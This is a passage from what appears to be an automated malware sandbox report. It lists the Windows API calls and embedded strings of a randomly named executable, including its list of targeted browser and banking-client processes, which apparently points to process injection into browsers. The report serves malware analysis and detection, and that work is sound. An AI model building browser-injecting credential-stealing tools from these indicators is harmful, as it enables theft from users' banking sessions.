e,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012E37E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012E37E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012E37E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	4_2_012F1660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E47300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E47300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E47300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	5_2_00E41660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E337E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E337E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E337E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E87300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E87300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E87300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThr